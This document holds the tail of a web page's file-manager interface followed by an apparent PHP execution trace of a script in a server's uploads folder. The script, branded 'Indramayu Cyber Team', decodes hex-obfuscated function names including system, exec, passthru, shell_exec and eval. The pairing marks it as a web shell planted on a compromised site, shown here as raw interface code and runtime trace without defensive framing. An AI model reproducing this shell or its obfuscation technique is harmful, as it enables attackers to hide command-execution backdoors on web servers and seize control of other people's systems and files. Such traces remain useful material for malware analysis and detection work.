	<div class="modal fade" id="viewModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">View</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <form action="" method="post">
		      <div class="modal-body">
		        <div class="mb-3">
	            <label for="content" class="col-form-label">Content:</label>
	            <textarea class="form-control" id="content" rows="15" name="content"></textarea>
	          </div>
		      </div>
		      <div class="modal-footer">
		        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
		        <button type="submit" class="btn btn-primary">Save</button>
		      </div>
	      </form>
	    </div>
	  </div>
	</div>
	
	<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js" integrity="sha384-gtEjrD/SeCtmISkJkNUaaKMoLD0//ElJ19smozuHV6z3Iehds+3Ulb9Bn9Plx0x4" crossorigin="anonymous"></script>
	<script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
	<script>
		var renameModal = document.getElementById('renameModal')
		var deleteModal = document.getElementById('deleteModal')
		var viewModal = document.getElementById('viewModal')
		var downloadModal = document.getElementById('downloadModal')
		
		renameModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var name = button.getAttribute('data-bs-name')
			var modalTitle = renameModal.querySelector('.modal-title')
			var modalBodyInput = renameModal.querySelector('.modal-body input')
			var hiddenInput = document.createElement('input')
			hiddenInput.type = "hidden";
			hiddenInput.value = name;
			hiddenInput.name = "oldname";
			document.getElementById("rename-form").appendChild(hiddenInput);
			
			modalBodyInput.value = name
		})
		
		deleteModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var file = button.getAttribute('data-bs-file')
			var deleteConfirm = document.getElementById('delete-confirm')
			deleteConfirm.href = '?dir=' + file + '&do=delete'
		})
		
		downloadModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var file = button.getAttribute('data-bs-file')
			var downloadConfirm = document.getElementById('download-confirm')
			downloadConfirm.href = '?dir=' + file + '&do=download'
		})
		
		viewModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var content = button.getAttribute('data-bs-content')
			var name = button.getAttribute('data-bs-name')
			var modalTitle = viewModal.querySelector('.modal-title')
			var modalContent = viewModal.querySelector('.modal-body textarea')
			var hiddenInput = document.createElement('input')
			hiddenInput.type = "hidden";
			hiddenInput.value = name;
			hiddenInput.name = "filename";
			viewModal.querySelector("form").appendChild(hiddenInput);

			modalTitle.textContent = 'Edit ' + name
			modalContent.value = content
		})
	</script>
</body>
</html>


Execution traces

data/traces/f366743e61abfbcb2d8ba600a3f7f514_trace-1676259933.3008.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:45:59.198665]
1	0	1	0.000148	393512
1	3	0	0.000967	574752	{main}	1		/var/www/html/uploads/index.php	0	0
1		A						/var/www/html/uploads/index.php	3	$shellName = 'Indramayu Cyber Team'
1		A						/var/www/html/uploads/index.php	4	$logo = 'https://1.bp.blogspot.com/-M0ZH5WcjeLk/YPHKrrDwwqI/AAAAAAAAALQ/UElzDOSvAwErnaFmd0hSxqxN6gCiC4-cwCLcBGAsYHQ/s320/images.jpeg'
1		A						/var/www/html/uploads/index.php	5	$func = [0 => '7068705f756e616d65', 1 => '70687076657273696f6e', 2 => '676574637764', 3 => '6368646972', 4 => '707265675f73706c6974', 5 => '61727261795f64696666', 6 => '69735f646972', 7 => '69735f66696c65', 8 => '69735f7772697461626c65', 9 => '69735f7265616461626c65', 10 => '66696c6573697a65', 11 => '636f7079', 12 => '66696c655f657869737473', 13 => '66696c655f7075745f636f6e74656e7473', 14 => '66696c655f6765745f636f6e74656e7473', 15 => '6d6b646972', 16 => '72656e616d65', 17 => '737472746f74696d65', 18 => '68746d6c7370656369616c6368617273', 19 => '64617465', 20 => '66696c656d74696d65', 21 => '7363616e646972', 22 => '73797374656d', 23 => '65786563', 24 => '7061737374687275', 25 => '7368656c6c5f65786563', 26 => '6f625f6765745f636f6e74656e7473', 27 => '6f625f656e645f636c65616e', 28 => '6469726e616d65', 29 => '6469736b5f746f74616c5f7370616365', 30 => '6469736b5f667265655f7370616365', 31 => '696e695f676574', 32 => '707265675f6d617463685f616c6c', 33 => '706f7369785f6765747077756964', 34 => '706f7369785f6765746772676964', 35 => '70617468696e666f', 36 => '66696c656f776e6572', 37 => '66696c6567726f7570', 38 => '66696c6574797065', 39 => '676574486f73744e616d65', 40 => '676574486f737442794e616d65', 41 => '737562737472', 42 => '737472737472', 43 => '696e695f736574', 44 => '66696c65', 45 => '7374725f7265706c616365', 46 => '6578706c6f6465', 47 => '6576616c', 48 => '6f625f7374617274', 49 => '66756e6374696f6e5f657869737473', 50 => '6572726f725f7265706f7274696e67', 51 => '7365745f74696d655f6c696d6974', 52 => '636c656172737461746361636865', 53 => '646174655f64656661756c745f74696d657a6f6e655f736574', 54 => '666c757368', 55 => '7374726c656e', 56 => '7472696d', 57 => '656d707479', 58 => '6973736574', 59 => '66696c657065726d73', 60 => '7374726c656e', 61 => '636f756e74', 62 => '726f756e64', 63 => '6d696d655f636f6e74656e745f74797065', 64 => '6765745f63757272656e745f75736572', 65 => '6765746d79756964', 66 => '6765746d79676964', 67 => '706f7369785f67657465756964', 68 => '706f7369785f67657465676964']
1		A						/var/www/html/uploads/index.php	7	$i = 0
2	4	0	0.001125	574752	dehex	1		/var/www/html/uploads/index.php	8	1	'7068705f756e616d65'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 17
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	5	0	0.001171	574784	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	5	1	0.001185	574832
3	5	R			112
3	6	0	0.001221	574752	chr	0		/var/www/html/uploads/index.php	178	1	112
3	6	1	0.001234	574792
3	6	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	7	0	0.001269	574816	hexdec	0		/var/www/html/uploads/index.php	178	1	'68'
3	7	1	0.001282	574864
3	7	R			104
3	8	0	0.001295	574784	chr	0		/var/www/html/uploads/index.php	178	1	104
3	8	1	0.001307	574824
3	8	R			'h'
2		A						/var/www/html/uploads/index.php	178	$r .= 'h'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	9	0	0.001345	574816	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	9	1	0.001358	574864
3	9	R			112
3	10	0	0.001370	574784	chr	0		/var/www/html/uploads/index.php	178	1	112
3	10	1	0.001382	574824
3	10	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	11	0	0.001413	574816	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	11	1	0.001425	574864
3	11	R			95
3	12	0	0.001437	574784	chr	0		/var/www/html/uploads/index.php	178	1	95
3	12	1	0.001449	574824
3	12	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	13	0	0.001480	574816	hexdec	0		/var/www/html/uploads/index.php	178	1	'75'
3	13	1	0.001492	574864
3	13	R			117
3	14	0	0.001504	574784	chr	0		/var/www/html/uploads/index.php	178	1	117
3	14	1	0.001516	574824
3	14	R			'u'
2		A						/var/www/html/uploads/index.php	178	$r .= 'u'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	15	0	0.001546	574816	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	15	1	0.001558	574864
3	15	R			110
3	16	0	0.001570	574784	chr	0		/var/www/html/uploads/index.php	178	1	110
3	16	1	0.001581	574824
3	16	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	17	0	0.001612	574816	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	17	1	0.001624	574864
3	17	R			97
3	18	0	0.001636	574784	chr	0		/var/www/html/uploads/index.php	178	1	97
3	18	1	0.001647	574824
3	18	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	19	0	0.001677	574816	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	19	1	0.001689	574864
3	19	R			109
3	20	0	0.001708	574784	chr	0		/var/www/html/uploads/index.php	178	1	109
3	20	1	0.001719	574824
3	20	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	21	0	0.001750	574824	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	21	1	0.001762	574872
3	21	R			101
3	22	0	0.001774	574792	chr	0		/var/www/html/uploads/index.php	178	1	101
3	22	1	0.001785	574832
3	22	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	4	1	0.001816	574792
2	4	R			'php_uname'
1		A						/var/www/html/uploads/index.php	8	$func[0] = 'php_uname'
1		A						/var/www/html/uploads/index.php	7	$i++
2	23	0	0.001852	583040	dehex	1		/var/www/html/uploads/index.php	8	1	'70687076657273696f6e'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 19
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	24	0	0.001893	583072	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	24	1	0.001905	583120
3	24	R			112
3	25	0	0.001917	583040	chr	0		/var/www/html/uploads/index.php	178	1	112
3	25	1	0.001928	583080
3	25	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	26	0	0.001959	583104	hexdec	0		/var/www/html/uploads/index.php	178	1	'68'
3	26	1	0.001971	583152
3	26	R			104
3	27	0	0.001983	583072	chr	0		/var/www/html/uploads/index.php	178	1	104
3	27	1	0.001994	583112
3	27	R			'h'
2		A						/var/www/html/uploads/index.php	178	$r .= 'h'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	28	0	0.002025	583104	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	28	1	0.002036	583152
3	28	R			112
3	29	0	0.002048	583072	chr	0		/var/www/html/uploads/index.php	178	1	112
3	29	1	0.002059	583112
3	29	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	30	0	0.002090	583104	hexdec	0		/var/www/html/uploads/index.php	178	1	'76'
3	30	1	0.002101	583152
3	30	R			118
3	31	0	0.002113	583072	chr	0		/var/www/html/uploads/index.php	178	1	118
3	31	1	0.002125	583112
3	31	R			'v'
2		A						/var/www/html/uploads/index.php	178	$r .= 'v'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	32	0	0.002154	583104	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	32	1	0.002166	583152
3	32	R			101
3	33	0	0.002178	583072	chr	0		/var/www/html/uploads/index.php	178	1	101
3	33	1	0.002189	583112
3	33	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	34	0	0.002219	583104	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	34	1	0.002230	583152
3	34	R			114
3	35	0	0.002242	583072	chr	0		/var/www/html/uploads/index.php	178	1	114
3	35	1	0.002253	583112
3	35	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	36	0	0.002283	583104	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	36	1	0.002295	583152
3	36	R			115
3	37	0	0.002307	583072	chr	0		/var/www/html/uploads/index.php	178	1	115
3	37	1	0.002318	583112
3	37	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	38	0	0.002347	583104	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	38	1	0.002359	583152
3	38	R			105
3	39	0	0.002371	583072	chr	0		/var/www/html/uploads/index.php	178	1	105
3	39	1	0.002382	583112
3	39	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	40	0	0.002412	583112	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	40	1	0.002423	583160
3	40	R			111
3	41	0	0.002440	583080	chr	0		/var/www/html/uploads/index.php	178	1	111
3	41	1	0.002451	583120
3	41	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	42	0	0.002481	583112	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	42	1	0.002493	583160
3	42	R			110
3	43	0	0.002505	583080	chr	0		/var/www/html/uploads/index.php	178	1	110
3	43	1	0.002516	583120
3	43	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	23	1	0.002545	583080
2	23	R			'phpversion'
1		A						/var/www/html/uploads/index.php	8	$func[1] = 'phpversion'
1		A						/var/www/html/uploads/index.php	7	$i++
2	44	0	0.002579	583080	dehex	1		/var/www/html/uploads/index.php	8	1	'676574637764'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 11
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	45	0	0.002620	583112	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	45	1	0.002632	583160
3	45	R			103
3	46	0	0.002644	583080	chr	0		/var/www/html/uploads/index.php	178	1	103
3	46	1	0.002655	583120
3	46	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	47	0	0.002686	583144	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	47	1	0.002697	583192
3	47	R			101
3	48	0	0.002709	583112	chr	0		/var/www/html/uploads/index.php	178	1	101
3	48	1	0.002721	583152
3	48	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	49	0	0.002751	583144	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	49	1	0.002763	583192
3	49	R			116
3	50	0	0.002775	583112	chr	0		/var/www/html/uploads/index.php	178	1	116
3	50	1	0.002786	583152
3	50	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	51	0	0.002816	583144	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	51	1	0.002828	583192
3	51	R			99
3	52	0	0.002840	583112	chr	0		/var/www/html/uploads/index.php	178	1	99
3	52	1	0.002851	583152
3	52	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	53	0	0.002881	583144	hexdec	0		/var/www/html/uploads/index.php	178	1	'77'
3	53	1	0.002892	583192
3	53	R			119
3	54	0	0.002904	583112	chr	0		/var/www/html/uploads/index.php	178	1	119
3	54	1	0.002916	583152
3	54	R			'w'
2		A						/var/www/html/uploads/index.php	178	$r .= 'w'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	55	0	0.002946	583144	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	55	1	0.002958	583192
3	55	R			100
3	56	0	0.002970	583112	chr	0		/var/www/html/uploads/index.php	178	1	100
3	56	1	0.002981	583152
3	56	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	44	1	0.003011	583112
2	44	R			'getcwd'
1		A						/var/www/html/uploads/index.php	8	$func[2] = 'getcwd'
1		A						/var/www/html/uploads/index.php	7	$i++
2	57	0	0.003044	583112	dehex	1		/var/www/html/uploads/index.php	8	1	'6368646972'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 9
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	58	0	0.003085	583144	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	58	1	0.003097	583192
3	58	R			99
3	59	0	0.003109	583112	chr	0		/var/www/html/uploads/index.php	178	1	99
3	59	1	0.003121	583152
3	59	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	60	0	0.003151	583176	hexdec	0		/var/www/html/uploads/index.php	178	1	'68'
3	60	1	0.003166	583224
3	60	R			104
3	61	0	0.003178	583144	chr	0		/var/www/html/uploads/index.php	178	1	104
3	61	1	0.003190	583184
3	61	R			'h'
2		A						/var/www/html/uploads/index.php	178	$r .= 'h'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	62	0	0.003220	583176	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	62	1	0.003232	583224
3	62	R			100
3	63	0	0.003244	583144	chr	0		/var/www/html/uploads/index.php	178	1	100
3	63	1	0.003255	583184
3	63	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	64	0	0.003285	583176	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	64	1	0.003297	583224
3	64	R			105
3	65	0	0.003309	583144	chr	0		/var/www/html/uploads/index.php	178	1	105
3	65	1	0.003321	583184
3	65	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	66	0	0.003351	583176	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	66	1	0.003362	583224
3	66	R			114
3	67	0	0.003374	583144	chr	0		/var/www/html/uploads/index.php	178	1	114
3	67	1	0.003385	583184
3	67	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	57	1	0.003415	583144
2	57	R			'chdir'
1		A						/var/www/html/uploads/index.php	8	$func[3] = 'chdir'
1		A						/var/www/html/uploads/index.php	7	$i++
2	68	0	0.003448	583144	dehex	1		/var/www/html/uploads/index.php	8	1	'707265675f73706c6974'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 19
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	69	0	0.003490	583176	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	69	1	0.003502	583224
3	69	R			112
3	70	0	0.003514	583144	chr	0		/var/www/html/uploads/index.php	178	1	112
3	70	1	0.003526	583184
3	70	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	71	0	0.003556	583208	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	71	1	0.003568	583256
3	71	R			114
3	72	0	0.003580	583176	chr	0		/var/www/html/uploads/index.php	178	1	114
3	72	1	0.003592	583216
3	72	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	73	0	0.003622	583208	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	73	1	0.003634	583256
3	73	R			101
3	74	0	0.003647	583176	chr	0		/var/www/html/uploads/index.php	178	1	101
3	74	1	0.003658	583216
3	74	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	75	0	0.003688	583208	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	75	1	0.003700	583256
3	75	R			103
3	76	0	0.003712	583176	chr	0		/var/www/html/uploads/index.php	178	1	103
3	76	1	0.003723	583216
3	76	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	77	0	0.003754	583208	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	77	1	0.003765	583256
3	77	R			95
3	78	0	0.003778	583176	chr	0		/var/www/html/uploads/index.php	178	1	95
3	78	1	0.003789	583216
3	78	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	79	0	0.003819	583208	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	79	1	0.003831	583256
3	79	R			115
3	80	0	0.003843	583176	chr	0		/var/www/html/uploads/index.php	178	1	115
3	80	1	0.003854	583216
3	80	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	81	0	0.003883	583208	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	81	1	0.003894	583256
3	81	R			112
3	82	0	0.003910	583176	chr	0		/var/www/html/uploads/index.php	178	1	112
3	82	1	0.003922	583216
3	82	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	83	0	0.003951	583208	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	83	1	0.003963	583256
3	83	R			108
3	84	0	0.003975	583176	chr	0		/var/www/html/uploads/index.php	178	1	108
3	84	1	0.003986	583216
3	84	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	85	0	0.004016	583216	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	85	1	0.004027	583264
3	85	R			105
3	86	0	0.004040	583184	chr	0		/var/www/html/uploads/index.php	178	1	105
3	86	1	0.004051	583224
3	86	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	87	0	0.004080	583216	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	87	1	0.004092	583264
3	87	R			116
3	88	0	0.004104	583184	chr	0		/var/www/html/uploads/index.php	178	1	116
3	88	1	0.004115	583224
3	88	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	68	1	0.004145	583184
2	68	R			'preg_split'
1		A						/var/www/html/uploads/index.php	8	$func[4] = 'preg_split'
1		A						/var/www/html/uploads/index.php	7	$i++
2	89	0	0.004179	583184	dehex	1		/var/www/html/uploads/index.php	8	1	'61727261795f64696666'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 19
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	90	0	0.004220	583216	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	90	1	0.004232	583264
3	90	R			97
3	91	0	0.004244	583184	chr	0		/var/www/html/uploads/index.php	178	1	97
3	91	1	0.004256	583224
3	91	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	92	0	0.004287	583248	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	92	1	0.004298	583296
3	92	R			114
3	93	0	0.004310	583216	chr	0		/var/www/html/uploads/index.php	178	1	114
3	93	1	0.004322	583256
3	93	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	94	0	0.004351	583248	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	94	1	0.004363	583296
3	94	R			114
3	95	0	0.004375	583216	chr	0		/var/www/html/uploads/index.php	178	1	114
3	95	1	0.004386	583256
3	95	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	96	0	0.004416	583248	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	96	1	0.004427	583296
3	96	R			97
3	97	0	0.004439	583216	chr	0		/var/www/html/uploads/index.php	178	1	97
3	97	1	0.004450	583256
3	97	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	98	0	0.004480	583248	hexdec	0		/var/www/html/uploads/index.php	178	1	'79'
3	98	1	0.004492	583296
3	98	R			121
3	99	0	0.004504	583216	chr	0		/var/www/html/uploads/index.php	178	1	121
3	99	1	0.004515	583256
3	99	R			'y'
2		A						/var/www/html/uploads/index.php	178	$r .= 'y'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	100	0	0.004545	583248	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	100	1	0.004557	583296
3	100	R			95
3	101	0	0.004569	583216	chr	0		/var/www/html/uploads/index.php	178	1	95
3	101	1	0.004580	583256
3	101	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	102	0	0.004611	583248	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	102	1	0.004622	583296
3	102	R			100
3	103	0	0.004638	583216	chr	0		/var/www/html/uploads/index.php	178	1	100
3	103	1	0.004649	583256
3	103	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	104	0	0.004679	583248	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	104	1	0.004691	583296
3	104	R			105
3	105	0	0.004703	583216	chr	0		/var/www/html/uploads/index.php	178	1	105
3	105	1	0.004715	583256
3	105	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	106	0	0.004745	583256	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	106	1	0.004757	583304
3	106	R			102
3	107	0	0.004769	583224	chr	0		/var/www/html/uploads/index.php	178	1	102
3	107	1	0.004781	583264
3	107	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	108	0	0.004811	583256	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	108	1	0.004823	583304
3	108	R			102
3	109	0	0.004835	583224	chr	0		/var/www/html/uploads/index.php	178	1	102
3	109	1	0.004846	583264
3	109	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	89	1	0.004876	583224
2	89	R			'array_diff'
1		A						/var/www/html/uploads/index.php	8	$func[5] = 'array_diff'
1		A						/var/www/html/uploads/index.php	7	$i++
2	110	0	0.004910	583224	dehex	1		/var/www/html/uploads/index.php	8	1	'69735f646972'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 11
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	111	0	0.004951	583256	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	111	1	0.004963	583304
3	111	R			105
3	112	0	0.004976	583224	chr	0		/var/www/html/uploads/index.php	178	1	105
3	112	1	0.004987	583264
3	112	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	113	0	0.005018	583288	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	113	1	0.005034	583336
3	113	R			115
3	114	0	0.005048	583256	chr	0		/var/www/html/uploads/index.php	178	1	115
3	114	1	0.005059	583296
3	114	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	115	0	0.005090	583288	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	115	1	0.005102	583336
3	115	R			95
3	116	0	0.005114	583256	chr	0		/var/www/html/uploads/index.php	178	1	95
3	116	1	0.005126	583296
3	116	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	117	0	0.005155	583288	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	117	1	0.005167	583336
3	117	R			100
3	118	0	0.005179	583256	chr	0		/var/www/html/uploads/index.php	178	1	100
3	118	1	0.005190	583296
3	118	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	119	0	0.005298	583288	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	119	1	0.005312	583336
3	119	R			105
3	120	0	0.005325	583256	chr	0		/var/www/html/uploads/index.php	178	1	105
3	120	1	0.005336	583296
3	120	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	121	0	0.005367	583288	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	121	1	0.005379	583336
3	121	R			114
3	122	0	0.005391	583256	chr	0		/var/www/html/uploads/index.php	178	1	114
3	122	1	0.005402	583296
3	122	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	110	1	0.005433	583256
2	110	R			'is_dir'
1		A						/var/www/html/uploads/index.php	8	$func[6] = 'is_dir'
1		A						/var/www/html/uploads/index.php	7	$i++
2	123	0	0.005475	583256	dehex	1		/var/www/html/uploads/index.php	8	1	'69735f66696c65'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 13
2		A						/var/www/html/uploads/index.php	177	$i = 0
